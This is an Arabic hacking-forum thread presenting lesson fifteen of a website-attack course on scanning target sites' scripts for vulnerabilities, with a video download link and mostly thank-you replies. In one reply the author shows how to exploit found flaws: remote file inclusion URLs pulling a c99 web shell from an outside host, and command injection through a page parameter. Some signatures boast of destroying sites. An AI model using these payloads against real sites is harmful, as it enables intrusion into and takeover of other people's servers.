|ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات

|ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات


النتائج 1 إلى 10 من 10

الموضوع: |ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات

  1. #1

    New |ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات

    السلام عليكم ورحمة الله وبركاتة
    بسم الله الرحمن الرحيم
    الصلاة والسلام على اشرف المرسلين وخاتم الانبياء سيدنا محمد


    درس اليوم هو شرح لكيفية فحص السكربتات من الثغرات,
    فحص سكربت موقع الهدف , وفي حال لم يتم التعرف على سكربت موقع الهدف سيتم فحص سكربتات السيرفر
    وكل هذا طبعا تم شرحة بالدرس ,طريقة معرفة سكربت موقع الهدف وكذلك سكربتات مواقع السيرفر...الخ
    وتم شرح على اكثر من طريقة لفحص السكربتات

    على كل حالـ.. وقبل تحميل الدرس

    ما هو السكربت ؟؟
    باختصار..
    السكربت هو نص برمجي مبرمج بعدة لغات مثل: php & asp & ...الخ
    وصمم لكي يسهل على مدراء المواقع استخدام الموقع والتحكم بة بسهولة وعدم وجود صعوبات كثيرة ..
    وكذلك لترتيب مواضيع الموقع على حسب تقسيم السكربت، فكل سكربت له تقسيم خاصه فيه بالطبع وكل سكربت يختلف عن السكربت الثاني بكل تأكيد.

    تماامـ..

    لتحميل الدرس من هنا..
    http://www.mediafire.com/?3qa6dcncy7kkh2h


    حجم الدرس قبل فك الضغط: 12 MB
    بعد فك الضغط: 23 MB
    وقت الفيديو: 25 دقيقه




    اتمنى انه قد كان شرح واضع ومفهوم للجميع..
    ولا تنسو من صالح دعائكم..

    تحياتي..
    اخوكم QtRoNiX FoX
    التعديل الأخير تم بواسطة QtRoNiX FoX ; 05-31-2013 الساعة 03:11 PM

    لا تترك صلاتك ابداً
    فهناك ألملايين تحت ألقبور يتمنون لو تعود بهم الحياة
    لـ يسجدو لو سجدة واحدة !



    اللهم صل وسلم وبارك على سيدنا محمد وعلى اله وصحبه اجمعين

    أستغفر الله العظيم الذي لا إله إلا هو الحي القيوم وأتوب إليه

  2. #2

    افتراضي رد: ~الدرس الثالث عشر~ البحث عن الثغرات بالسكربتات

    مشكوووور اخي يشرفني اكون اول من يرد على الدرس
    تقبل مروري ياغالي

  3. #3

    افتراضي رد: ~الدرس الثالث عشر~ البحث عن الثغرات بالسكربتات

    مشكوووور اخي يشرفني اكون اول من يرد على الدرس
    تقبل مروري ياغالي

  4. #4

    افتراضي رد: ~الدرس الثالث عشر~ البحث عن الثغرات بالسكربتات


    ما شاء الله تباركـ الله
    بطل كعادتكـ
    ياربي من جد كنت اتعب نفسي
    انزل السكربت وروح لي ملف ملف
    وابحث عن طريق المفكرة
    لا و اذا وجدت خطا اقول { اوف باقي المسار } من جد كنت اتعب نفسي
    هي بسراحه شغلات بسيطه بس الي يطفشك فيها انك تكررها كل شوي وفي جميع الملفات
    اما الحين ابي اريح راسي استخدم البرنامج JAAScoisX-Code.exe
    ربي يعطيكــ
    بنتظار الدرس القادم .
    تحياتي .

  5. #5

    افتراضي رد: ~الدرس الثالث عشر~ البحث عن الثغرات بالسكربتات

    اقتباس المشاركة الأصلية كتبت بواسطة Z3r0-c00l مشاهدة المشاركة
    مشكوووور اخي يشرفني اكون اول من يرد على الدرس
    تقبل مروري ياغالي
    هلا فيك حبيبي
    بالتوفيق..
    اقتباس المشاركة الأصلية كتبت بواسطة اخلاقي تاج راسي مشاهدة المشاركة

    ما شاء الله تباركـ الله
    بطل كعادتكـ
    ياربي من جد كنت اتعب نفسي
    انزل السكربت وروح لي ملف ملف
    وابحث عن طريق المفكرة
    لا و اذا وجدت خطا اقول { اوف باقي المسار } من جد كنت اتعب نفسي
    هي بسراحه شغلات بسيطه بس الي يطفشك فيها انك تكررها كل شوي وفي جميع الملفات
    اما الحين ابي اريح راسي استخدم البرنامج JAAScoisX-Code.exe
    ربي يعطيكــ
    بنتظار الدرس القادم .
    تحياتي .
    نورت اخوي 'اخلاقي'
    شوف يالغالي..
    بخصوص انك بعد ما تلاقي خطأء وتجيلك مشكلة انك كيف تعرف مسار الثغرة عشان تطبقها على الموقع..
    هاي سهله جدا, يعني لنفترض انك حملت سكربت وورد برسس عشان تفحصه يدوي على طريقتك انتي(اليدوية), ولنفترض كمان انك وجدت ثغرة داخل ملف wp-settings مثلاا..
    وهذا ملف الـwp-settings موجود على الرئيسيه في سكربت وورد برسس ولنفترض كمان انه الموقع مركب السكربت على الرئيسيه مش داخل مجلدات واذا بدك تدخل مثلا على لوحة التحكم تدخل هكذا
    www.site.com/wp-login.php
    وكمان نفس الشي اذا بدك تستعرض ملف wp-settings رح يكون الاستعراض هكذا
    www.site.com/wp-settings.php
    وكمان لنفترض انه الدالات المصابه هني على سبيل المثال: qx ودالة اخرى اسمها aljyyosh ونوع الثغرة لنفترض كمان انها ثغرة الفايل انكلود File Include وثغرة الفايل انكلود لازم يكون معك شل بصيغة txt مرفوع موقع عادي
    الاستغلال راح يكون هيك:
    www.site.com/wp-settings.php?qx=http://c99.gen.tr/c99.txt?
    http://c99.gen.tr/c99.txt? :: هذا الشل الي بصيغة تكست
    وكمان بنفع يكون الاستغلال هيك:
    www.site.com/wp-settings.php?aljyyosh=http://c99.gen.tr/c99.txt?

    ونفس الشي اذا كانت الثغرة موجوده داخل مجلد او مجلدات., مثلا داخل هذا المسار wp-content\themes\twentyten والملف المصاب archive مثلا.. والدالة المصابة qx, ونوع الثغرة الكوماند,, الاستغلال رح يكون هيك
    www.site.com/wp-content/themes/twentyten/archive.php?qx=pwd
    pwd :: امر من وامر الينكس يعرض لك مسارك على السيرفر

    بالتوفيق لك اخوي..

  6. #6

    افتراضي رد: ~الدرس الثالث عشر~ البحث عن الثغرات بالسكربتات

    مشكووور اخي وبانتظار جديدك يا مبدع
    ..# من عرفتكَ وحآلتي صعيبه / سآقط في آلمدرسه ؛ وضآيع في ' حيآآتي ' #..

    ما اقول اني بطل ولا اقول اني .. ( مصيبه ) انا ( خفآش ) يالخبل .. عمري ماتمنيت شيء وماقدرت اجيبه

    لازم تذوق الذل وتعيش مكسور ,, هذا وعد مني مادمت انا حي

    تبآ للعآلم وتبآ للحمآيات ســوف ادمر بلآ تـوقف آمآ الموت او السجن

    يشهد لي قوقل اني بطل . . .
    [B]
    الكل هنا كبير و لكن لا تغرَك المظاهر انا لست سوى بمبنتدئ

  7. #7
    هكر مبتديء الصورة الرمزية هكر فاضي
    تاريخ التسجيل
    Sep 2010
    الدولة
    عالم لا رحمة فيه
    المشاركات
    95

    افتراضي رد: |ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات

    مشكور أخي الكريم يعطيك العافية وبأنتظار المزيد
    I Will Show No Mercy









  8. #8
    هكر مجتهد الصورة الرمزية dark haCk
    تاريخ التسجيل
    Apr 2012
    الدولة
    في قلب الحـــــــدث
    المشاركات
    288

    افتراضي رد: |ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات

    ماهي غريبة عليك لانك مميز ومبدع بمعنى الكلمة الله لايحرمنا منك يارب
    الوفاء و الاخلاص يصعب على ناس..:..و الخسيس بدري عليه يطول المرجلة
    الصدق بـ هالزمن عمله بدون قياس..:..والكذب أصبح جواب لكل الاسئلة
    تبدي نصيحة للرفيق ويجعل للزعل نبراس..:..ويكون جزاء المعروف الهجران والصده
    عجزت أفهمك يا زمن بدون ما أحتاس..:..وإلا كيف تكون غالي في غياب المصلحة
    تدور بك دنياك وتقر إن البشر أجناس..:..ويحدك زمانك على الضيق فأشكره

  9. #9

    افتراضي رد: |ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات

    شكراً يا غالي
    | الجيـــــش الســـــوري الحــــر |
    ##############
    #############
    ##############
    " فريق قراصنة الثورة السورية "

  10. #10
    هكر مبتديء الصورة الرمزية salahuiste
    تاريخ التسجيل
    Jun 2012
    الدولة
    دولة الخلافة أعزها الله
    المشاركات
    95

    افتراضي رد: |ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات

    مشكوووووووووور

المواضيع المتشابهه

  1. [الدرس الثالث] انواع الثغرات
    بواسطة ASDELY-ScOrPiOn في المنتدى دورة اختراق المواقع
    مشاركات: 223
    آخر مشاركة: 06-01-2021, 10:49 AM
  2. الدرس الثالث: البحث عن الثغرات ورفع الشيل
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 454
    آخر مشاركة: 06-09-2012, 12:52 AM
  3. طريقة البحث عن الثغرات وايجادها خاص بالمبتدئين
    بواسطة مدمر القراصنة في المنتدى قسم الثغرات
    مشاركات: 67
    آخر مشاركة: 02-14-2012, 04:32 PM
  4. الدرس الاول - البحث عن الثغرات في ميلوورم وتطبيق على ثغرة Sql injection
    بواسطة الشريف 515 في المنتدى منتدى الإختراق العام
    مشاركات: 3
    آخر مشاركة: 09-28-2010, 12:39 AM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •